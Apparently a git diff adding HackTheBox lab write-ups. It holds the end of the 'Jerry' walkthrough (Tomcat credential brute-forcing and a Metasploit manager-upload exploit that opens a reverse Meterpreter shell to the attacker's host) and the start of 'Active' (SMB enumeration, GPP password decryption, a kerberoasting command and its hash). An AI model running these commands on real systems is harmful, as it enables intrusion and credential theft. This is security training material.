+ [-] 10.10.10.95:8080 - LOGIN FAILED: manager:vagrant (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:admin (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:manager (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:role1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:root (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:tomcat (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:s3cret (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: role1:vagrant (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:admin (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:manager (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:role1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:root (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:tomcat (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:s3cret (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:vagrant (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:role1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:root (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:tomcat (Incorrect)
+
+ **[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret**
+
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:admin (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:manager (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:role1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:root (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:tomcat (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:s3cret (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: both:vagrant (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: root:owaspbwa (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: xampp:xampp (Incorrect)
+ [-] 10.10.10.95:8080 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
+
+
+The metasploit module bruteforced a few combinations and found the credentials **tomcat:s3cret**!
+
+## **Part 3 : Getting Root Access**
+
+In order to gain access to the system, we'll use the tomcat_mgr_upload metasploit module setting it's parameters with the credentials we found earlier
+
+
+ msf5 > use multi/http/tomcat_mgr_upload
+ msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
+ HttpPassword => s3cret
+ msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
+ HttpUsername => tomcat
+ msf5 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
+ RPORT => 8080
+ msf5 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 10.10.10.95
+ RHOSTS => 10.10.10.95
+ msf5 exploit(multi/http/tomcat_mgr_upload) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
+ [*] Retrieving session ID and CSRF token...
+ [*] Uploading and deploying TL8gS9C...
+ [*] Executing TL8gS9C...
+ [*] Sending stage (53928 bytes) to 10.10.10.95
+ [*] Undeploying TL8gS9C ...
+ [*] Meterpreter session 1 opened (10.10.14.48:4444 -> 10.10.10.95:49192) at 2019-11-28 08:59:45 +0100
+
+ meterpreter > sysinfo
+ Computer : JERRY
+ OS : Windows Server 2012 R2 6.3 (amd64)
+ Meterpreter : java/windows
+ meterpreter > shell
+ Process 1 created.
+ Channel 1 created.
+ Microsoft Windows [Version 6.3.9600]
+ (c) 2013 Microsoft Corporation. All rights reserved.
+
+ C:\apache-tomcat-7.0.88>whoami
+ whoami
+ nt authority\system
+
+
+And we're in ! the metasploit module spawned a meterpreter session as NT AUTHORITY , now all that's left to do is to find the user and root flags on the system.
+
+
+ C:\apache-tomcat-7.0.88>ls
+ ls
+
+ C:\apache-tomcat-7.0.88>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is FC2B-E489
+
+ Directory of C:\apache-tomcat-7.0.88
+
+ 06/19/2018 03:07 AM <****DIR> .
+ 06/19/2018 03:07 AM <****DIR> ..
+ 06/19/2018 03:06 AM <****DIR> bin
+ 06/19/2018 05:47 AM <****DIR> conf
+ 06/19/2018 03:06 AM <****DIR> lib
+ 05/07/2018 01:16 PM 57,896 LICENSE
+ 11/28/2019 04:43 PM <****DIR> logs
+ 05/07/2018 01:16 PM 1,275 NOTICE
+ 05/07/2018 01:16 PM 9,600 RELEASE-NOTES
+ 05/07/2018 01:16 PM 17,454 RUNNING.txt
+ 11/28/2019 05:00 PM <****DIR> temp
+ 11/28/2019 05:00 PM <****DIR> webapps
+ 06/19/2018 03:34 AM <****DIR> work
+ 4 File(s) 86,225 bytes
+ 9 Dir(s) 27,600,842,752 bytes free
+
+ C:\apache-tomcat-7.0.88>cd ../..
+ cd ../..
+
+ C:\>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is FC2B-E489
+
+ Directory of C:\
+
+ 06/19/2018 03:07 AM <****DIR> apache-tomcat-7.0.88
+ 08/22/2013 05:52 PM <****DIR> PerfLogs
+ 06/19/2018 05:42 PM <****DIR> Program Files
+ 06/19/2018 05:42 PM <****DIR> Program Files (x86)
+ 06/18/2018 10:31 PM <****DIR> Users
+ 06/19/2018 05:54 PM <****DIR> Windows
+ 0 File(s) 0 bytes
+ 6 Dir(s) 27,600,842,752 bytes free
+
+ C:\>cd Users
+ cd Users
+
+ C:\Users>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is FC2B-E489
+
+ Directory of C:\Users
+
+ 06/18/2018 10:31 PM <****DIR> .
+ 06/18/2018 10:31 PM <****DIR> ..
+ 06/18/2018 10:31 PM <****DIR> Administrator
+ 08/22/2013 05:39 PM <****DIR> Public
+ 0 File(s) 0 bytes
+ 4 Dir(s) 27,600,842,752 bytes free
+
+ C:\Users>cd Administrator
+ cd Administrator
+
+ C:\Users\Administrator>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is FC2B-E489
+
+ Directory of C:\Users\Administrator
+
+ 06/18/2018 10:31 PM <****DIR> .
+ 06/18/2018 10:31 PM <****DIR> ..
+ 06/19/2018 05:43 AM <****DIR> Contacts
+ 06/19/2018 06:09 AM <****DIR> Desktop
+ 06/19/2018 05:43 AM <****DIR> Documents
+ 06/19/2018 05:43 AM <****DIR> Downloads
+ 06/19/2018 05:43 AM <****DIR> Favorites
+ 06/19/2018 05:43 AM <****DIR> Links
+ 06/19/2018 05:43 AM <****DIR> Music
+ 06/19/2018 05:43 AM <****DIR> Pictures
+ 06/19/2018 05:43 AM <****DIR> Saved Games
+ 06/19/2018 05:43 AM <****DIR> Searches
+ 06/19/2018 05:43 AM <****DIR> Videos
+ 0 File(s) 0 bytes
+ 13 Dir(s) 27,600,842,752 bytes free
+
+ C:\Users\Administrator>cd Desktop
+ cd Desktop
+
+ C:\Users\Administrator\Desktop>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is FC2B-E489
+
+ Directory of C:\Users\Administrator\Desktop
+
+ 06/19/2018 06:09 AM <****DIR> .
+ 06/19/2018 06:09 AM <****DIR> ..
+ 06/19/2018 06:09 AM <****DIR> flags
+ 0 File(s) 0 bytes
+ 3 Dir(s) 27,600,842,752 bytes free
+
+ dministrator\Desktop>cd flags
+ cd flags
+
+ C:\Users\Administrator\Desktop\flags>dir
+ dir | more
+ Volume in drive C has no label.
+ Volume Serial Number is FC2B-E489
+
+ Directory of C:\Users\Administrator\Desktop\flags
+
+ 06/19/2018 06:09 AM <****DIR> .
+ 06/19/2018 06:09 AM <****DIR> ..
+ 06/19/2018 06:11 AM 88 2 for the price of 1.txt
+ 1 File(s) 88 bytes
+ 2 Dir(s) 27,600,842,752 bytes free
+
+
+ C:\Users\Administrator\Desktop\flags>more "2 for the price of 1.txt"
+ more "2 for the price of 1.txt"
+ user.txt
+ 70XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ root.txt
+ 04XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And thats it ! we have been able to find both the root and user flags at the same time.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/21.md b/Easy/21.md
new file mode 100644
index 0000000..7d70f0f
--- /dev/null
+++ b/Easy/21.md
@@ -0,0 +1,510 @@
+# Active Writeup
+
+
+
+## Introduction :
+
+Active is an easy Windows box released back in July 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the **-F** flag in order to enumerate the opened ports quickly.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~ ]
+ → nmap -F 10.10.10.100
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-28 10:28 CET
+ Nmap scan report for 10.10.10.100
+ Host is up (0.079s latency).
+ Not shown: 89 closed ports
+ PORT STATE SERVICE
+ 53/tcp open domain
+ 88/tcp open kerberos-sec
+ 135/tcp open msrpc
+ 139/tcp open netbios-ssn
+ 389/tcp open ldap
+ 445/tcp open microsoft-ds
+ 49152/tcp open unknown
+ 49153/tcp open unknown
+ 49154/tcp open unknown
+ 49155/tcp open unknown
+ 49157/tcp open unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
+
+
+We are going to take a closer look at the ports 53, 80, 135, 139, 389, 445, using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~ ]
+ → nmap -sC -sV -Pn 10.10.10.100 -p 53,88,135,139,389,445
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-28 10:29 CET
+ Nmap scan report for 10.10.10.100
+ Host is up (0.086s latency).
+
+ PORT STATE SERVICE VERSION
+ 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
+ | dns-nsid:
+ |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
+ 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-11-28 09:30:01Z)
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
+ 445/tcp open microsoft-ds?
+ Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: 17s
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled and required
+ | smb2-time:
+ | date: 2019-11-28T09:30:07
+ |_ start_date: 2019-11-28T09:25:41
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 20.66 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+To enumerate the SMB Shares we'll be working with, we will use the enum4linux tool.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~ ]
+ → enum4linux 10.10.10.100
+ Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Nov 28 10:52:05 2019
+
+ ==========================
+ | Target Information |
+ ==========================
+ Target ........... 10.10.10.100
+ RID Range ........ 500-550,1000-1050
+ Username ......... ''
+ Password ......... ''
+ Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
+
+
+ ====================================================
+ | Enumerating Workgroup/Domain on 10.10.10.100 |
+ ====================================================
+ Cant load /etc/samba/smb.conf - run testparm to debug it
+ [E] Cant find workgroup/domain
+
+
+ ============================================
+ | Nbtstat Information for 10.10.10.100 |
+ ============================================
+ Cant load /etc/samba/smb.conf - run testparm to debug it
+ Looking up status of 10.10.10.100
+ No reply from 10.10.10.100
+
+ =====================================
+ | Session Check on 10.10.10.100 |
+ =====================================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 437.
+ [+] Server 10.10.10.100 allows sessions using username '', password ''
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 451.
+ [+] Got domain/workgroup name:
+
+ ===========================================
+ | Getting domain SID for 10.10.10.100 |
+ ===========================================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 359.
+ Unable to initialize messaging context
+ rpcclient: Cant load /etc/samba/smb.conf - run testparm to debug it
+ [+] Cant determine if host is part of domain or part of a workgroup
+
+ ======================================
+ | OS information on 10.10.10.100 |
+ ======================================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 458.
+ Use of uninitialized value $os_info in concatenation (.) or string at /bin/enum4linux line 464.
+ [+] Got OS info for 10.10.10.100 from smbclient:
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 467.
+ [+] Got OS info for 10.10.10.100 from srvinfo:
+ Unable to initialize messaging context
+ rpcclient: Cant load /etc/samba/smb.conf - run testparm to debug it
+
+ =============================
+ | Users on 10.10.10.100 |
+ =============================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 866.
+ Use of uninitialized value $users in print at /bin/enum4linux line 874.
+ Use of uninitialized value $users in pattern match (m//) at /bin/enum4linux line 877.
+
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 881.
+ Use of uninitialized value $users in print at /bin/enum4linux line 888.
+ Use of uninitialized value $users in pattern match (m//) at /bin/enum4linux line 890.
+
+ =========================================
+ | Share Enumeration on 10.10.10.100 |
+ =========================================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 640.
+ Unable to initialize messaging context
+ smbclient: Cant load /etc/samba/smb.conf - run testparm to debug it
+ do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
+
+ Sharename Type Comment
+ --------- ---- -------
+ ADMIN$ Disk Remote Admin
+ C$ Disk Default share
+ IPC$ IPC Remote IPC
+ NETLOGON Disk Logon server share
+ Replication Disk
+ SYSVOL Disk Logon server share
+ Users Disk
+ Reconnecting with SMB1 for workgroup listing.
+ Unable to connect with SMB1 -- no workgroup available
+
+ [+] Attempting to map shares on 10.10.10.100
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/ADMIN$ Mapping: DENIED, Listing: N/A
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/C$ Mapping: DENIED, Listing: N/A
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/IPC$ Mapping: OK Listing: DENIED
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/NETLOGON Mapping: DENIED, Listing: N/A
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/Replication Mapping: OK, Listing: OK
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/SYSVOL Mapping: DENIED, Listing: N/A
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
+ //10.10.10.100/Users Mapping: DENIED, Listing: N/A
+
+ ====================================================
+ | Password Policy Information for 10.10.10.100 |
+ ====================================================
+ [E] Unexpected error from polenum:
+ Traceback (most recent call last):
+ File "/usr/bin/polenum", line 16, in
+ from impacket.dcerpc.v5.rpcrt import DCERPC_v5
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 501.
+ ImportError: No module named impacket.dcerpc.v5.rpcrt
+ [+] Retieved partial password policy with rpcclient:
+
+
+
+ ==============================
+ | Groups on 10.10.10.100 |
+ ==============================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 542.
+
+ [+] Getting builtin groups:
+
+ [+] Getting builtin group memberships:
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 542.
+
+ [+] Getting local groups:
+
+ [+] Getting local group memberships:
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 593.
+
+ [+] Getting domain groups:
+
+ [+] Getting domain group memberships:
+
+ =======================================================================
+ | Users on 10.10.10.100 via RID cycling (RIDS: 500-550,1000-1050) |
+ =======================================================================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 742.
+
+ =============================================
+ | Getting printer info for 10.10.10.100 |
+ =============================================
+ Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 991.
+ Unable to initialize messaging context
+ rpcclient: Cant load /etc/samba/smb.conf - run testparm to debug it
+
+
+ enum4linux complete on Thu Nov 28 10:53:01 2019
+
+
+
+We seem to have access to the Replication Share, so we will navigate to it in order to see what we can work with.
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist] → smbclient -N -U "" //10.10.10.100/Replication
+ Unable to initialize messaging context
+ smbclient: Cant load /etc/samba/smb.conf - run testparm to debug it
+ Try "help" to get a list of possible commands.
+ smb: \> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ active.htb D 0 Sat Jul 21 12:37:44 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \> cd active.htb
+ smb: \active.htb\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ DfsrPrivate DHS 0 Sat Jul 21 12:37:44 2018
+ Policies D 0 Sat Jul 21 12:37:44 2018
+ scripts D 0 Wed Jul 18 20:48:57 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\> cd scripts
+ smb: \active.htb\scripts\> ls
+ . D 0 Wed Jul 18 20:48:57 2018
+ .. D 0 Wed Jul 18 20:48:57 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\scripts\> cd ..
+ smb: \active.htb\> cd DfsPrivate
+ cd \active.htb\DfsPrivate\: NT_STATUS_OBJECT_NAME_NOT_FOUND
+ smb: \active.htb\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ DfsrPrivate DHS 0 Sat Jul 21 12:37:44 2018
+ Policies D 0 Sat Jul 21 12:37:44 2018
+ scripts D 0 Wed Jul 18 20:48:57 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\> cd Policies
+ smb: \active.htb\Policies\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ {31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 12:37:44 2018
+ {6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 12:37:44 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ GPT.INI A 23 Wed Jul 18 22:46:06 2018
+ Group Policy D 0 Sat Jul 21 12:37:44 2018
+ MACHINE D 0 Sat Jul 21 12:37:44 2018
+ USER D 0 Wed Jul 18 20:49:12 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINE
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ Microsoft D 0 Sat Jul 21 12:37:44 2018
+ Preferences D 0 Sat Jul 21 12:37:44 2018
+ Registry.pol A 2788 Wed Jul 18 20:53:45 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferences
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ Groups D 0 Sat Jul 21 12:37:44 2018
+ c
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ Groups.xml A 533 Wed Jul 18 22:46:06 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
+ getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit
+
+
+
+Opening up the groups.xml file we see that we have a hashed password to work with.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Active] → cat Groups.xml
+ <****?xml version="1.0" encoding="utf-8"?****> <****Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"> <****User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"> <****Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
+ <****/Groups>
+
+We seem to have a hashed password and a Username : SVC_TGS
+
+
+ cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
+
+
+We will be using the gpp-decrypt tool in order to decrypt the hashed password.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Active] → gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
+ /usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
+ GPPstillStandingStrong2k18
+
+
+And we now have the credentials **SVC_TGS:GPPstillStandingStrong2k18** ! Let's see if we can login.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Active] → smbclient -U svc_tgs //10.10.10.100/Users
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ Enter WORKGROUP\svc_tgs's password:
+ Try "help" to get a list of possible commands.
+ smb: \> whoami
+ whoami: command not found
+ smb: \> id
+ id: command not found
+ smb: \> ls
+ . DR 0 Sat Jul 21 16:39:20 2018
+ .. DR 0 Sat Jul 21 16:39:20 2018
+ Administrator D 0 Mon Jul 16 12:14:21 2018
+ All Users DHS 0 Tue Jul 14 07:06:44 2009
+ Default DHR 0 Tue Jul 14 08:38:21 2009
+ Default User DHS 0 Tue Jul 14 07:06:44 2009
+ desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
+ Public DR 0 Tue Jul 14 06:57:55 2009
+ SVC_TGS D 0 Sat Jul 21 17:16:32 2018
+
+ 10459647 blocks of size 4096. 4924856 blocks available
+ smb: \> cd SVC_TGS
+ smb: \SVC_TGS\> ls
+ . D 0 Sat Jul 21 17:16:32 2018
+ .. D 0 Sat Jul 21 17:16:32 2018
+ Contacts D 0 Sat Jul 21 17:14:11 2018
+ Desktop D 0 Sat Jul 21 17:14:42 2018
+ Downloads D 0 Sat Jul 21 17:14:23 2018
+ Favorites D 0 Sat Jul 21 17:14:44 2018
+ Links D 0 Sat Jul 21 17:14:57 2018
+ My Documents D 0 Sat Jul 21 17:15:03 2018
+ My Music D 0 Sat Jul 21 17:15:32 2018
+ My Pictures D 0 Sat Jul 21 17:15:43 2018
+ My Videos D 0 Sat Jul 21 17:15:53 2018
+ Saved Games D 0 Sat Jul 21 17:16:12 2018
+ Searches D 0 Sat Jul 21 17:16:24 2018
+
+ 10459647 blocks of size 4096. 4924856 blocks available
+ smb: \SVC_TGS\> cd Desktop
+ smb: \SVC_TGS\Desktop\> ls
+ . D 0 Sat Jul 21 17:14:42 2018
+ .. D 0 Sat Jul 21 17:14:42 2018
+ user.txt A 34 Sat Jul 21 17:06:25 2018
+
+ 10459647 blocks of size 4096. 4924856 blocks available
+ smb: \SVC_TGS\Desktop\> get user.txt
+ getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
+ smb: \SVC_TGS\Desktop\> exit
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Active] → cat user.txt
+ 86XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to log in as the user SVC_TGS and print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Earlier our nmap scan picked up the 88th port running the kerberos service. so we will run the python script **kerberoastv2.py**
+
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Active/PyKerberoast] at master ✔
+ → python2 kerberoastv2.py -a 10.10.10.100 -b cn=users,dc=active,dc=htb -d active -u svc_tgs -p GPPstillStandingStrong2k18 > HASH.txt
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Active/PyKerberoast] at master ✔
+ → cat HASH.txt
+
+ [+]Starting...
+ $krb5tgs$18$*krbtgt$ACTIVE.HTB$spn*$cabf481b2b4dbd9567c5bee15e9d2ec9$04f2407e7fadab18a8f8ebda0e66af92e91c305098340e701383738a9cd317b15024815917af864e679ae02f8b610e18842308a54a9f0a2095ab688a972c5e03903f5d2cbf2d72cc5894ff6fa45413b95a1c94ee8fd1c9e8990c95748ba93a83bc078b3653b678a60fa0eb42cdaccdb3b4e5d5d97925676059c5b3495ce37a1fc964cf7cdeba452811d52a103633ffc5033709c3a2ac0f4f0a6aa06700b2817956c37c2f20e4ef5684b41d3f87e3f7fd80ed51088ef648f874b5fe113b5da0ebe5c7e77d63945ca190bb1dab377f75f6da85cbc261635fefdd42e621ac711c26c87d99b761941330e010fec48fd06219cd1aa7a8e91c9b0f36728ca30e68128db767e2e54c57d185b0700c03e7eb66fa62903971cdca7d481e4d4db09cc22a943ddb8ead77b4a2f2fc5cac6f34a6af8e796b5dd9f2e4310af99271a64af70c2c3aacfb8820b805d8efb3899e7a4d22c5adbf33f970e8fa7ce8ea79ad83a265aa3a4af2464d7cb296333199251a27f2fc189935f87c116e9143accd254ba4fb5d2a6f80af535076afbf8a89bea83941f703d312605d7fadc5d6583c9a86463ddc69165bdb0aabeab30edee51032dc160e3e349eb2f0c465f891015b7a127c9ef47949fdba2c1e2392d0cee6d03f54e5d36e63be681d1d2ad084c0f892b447352039488f21c184d7d0d5d68c0f15197579217ac48d3f1770710e5e0af95140d7394aae11371fd098b9591a1f6de4d4448db180a612917a8b0309e1b1a443d52d40f974e1036406c0aacf46b3be2286408cacd0c55a0e3146e7226cf6ab9c5d1b2af6939eac9c750c652f02925ab0549c3fd56f3655ceb37ec368dc24c034e6030a1b25dac3691e80098547a08b638560f2ffd37dcde83df28152fcbc9a93d9ef11a2e84f5b8efd3c8489983dceb394d22969d9c86b06af4b6633c55d86f61d1feac5dd4c541fa4e405b2b2e5fc41622833a45026dfef1e7a04b0577f2b5229b68e12af85af2cc074c3aae267c1c942cea9bcb21640bd2d0fe75996f93623e5cbaab186b7cedef4c1db1240b5c8cbb486f50bc7fafed38cd40a7605a6511d0cd393c8aa1c0387c7df9bd8c9a3f3af3eb2fe6341a88c6fac220f53725cd574f92c75e1f1a47be01a1a6bbf865fef2a681b981f2a2cf126797b7fcab95315c430f46e6140266d69